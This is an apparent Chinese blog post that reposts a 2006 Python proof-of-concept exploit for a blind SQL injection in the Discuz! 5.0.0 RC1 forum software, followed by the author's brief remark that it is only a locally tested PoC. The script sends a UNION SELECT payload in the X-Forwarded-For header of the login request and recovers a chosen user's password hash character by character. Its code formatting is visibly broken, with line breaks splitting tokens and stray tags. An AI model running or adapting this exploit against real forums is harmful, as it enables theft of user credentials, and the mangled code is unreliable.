这里把网上公布的code也贴出来:

#!/usr/bin/python
#
 Discuz! 5.0.0 RC1 SQL injection PoC
#
 Author: wofeiwo thx superheis help
#
 Date: Aug 12th 2006

import sys 
import httplib
from urlparse import urlparse
from time import sleep


def  injection (lenthofpass, realurl, path):
    sys.stdout.write(
'[+] The uid=' + sys.argv[2+ ' password hash is: ')
    
for num in range(1,lenthofpass+1):
        ran 
= range(97123)
        
for a in range(4858): ran.append(a)

        
for i in ran:
    
            query 
= '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
            header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1+ path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
            data 
= "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
            
#print header
            #sys.exit(1)
            http = httplib.HTTPConnection(realurl[1])
            http.request(
"POST", path + "logging.php?action=login&",data , header)
            
#sleep(1)
            response = http.getresponse()
            re1 
= response.read()
            
if re1.find('SELECT'== -1:
                
print '\n[-] Unvulnerable host'
                
print '[-] Exit..'
                sys.exit(
1);
    
            
elif re1.find('ip3'== -1:
                sys.stdout.write(chr(i))
                http.close()
                
#sleep(1)
                break
            
            
#print re1
            #print '-----------------------------------------------'
            http.close()
            
#sleep(1)
    sys.stdout.write('\n')

def main ():
    
print 'Discuz! 5.0.0 RC1 SQL injection exploit'
    
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

    
if len(sys.argv) == 3:
        url 
= urlparse(sys.argv[1])
        
if url[2:-1!= '/':
            u 
= url[2+ '/'
        
else
            u 
= url[2]
    
else:
        
print "Usage: %s <url> <uid>" % sys.argv[0]
        
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
        sys.exit(0)
    
    lenth 
= 32
    
print '[+] Connect %s' % url[1]
    
print '[+] Trying'
    
print '[+] Plz wait a long long time'

    injection(lenth, url, u)

    
print '[+] Finished'


if __name__ == '__main__': main()


btw: 我一直认为,0day不是最重要的,重要的是懂得其理
我写的这个Code就像PoC的字面意思一样,只不过是个证明而已.所以也没必要写成最优代码.这个code我只本地测试过.远程测试不成功是很正常的.当然,如果懂了原理,写个能用的exploit还是很方便的.否则连为什么不成功都不清不楚,也只有郁闷着了.

Comments
Write a Comment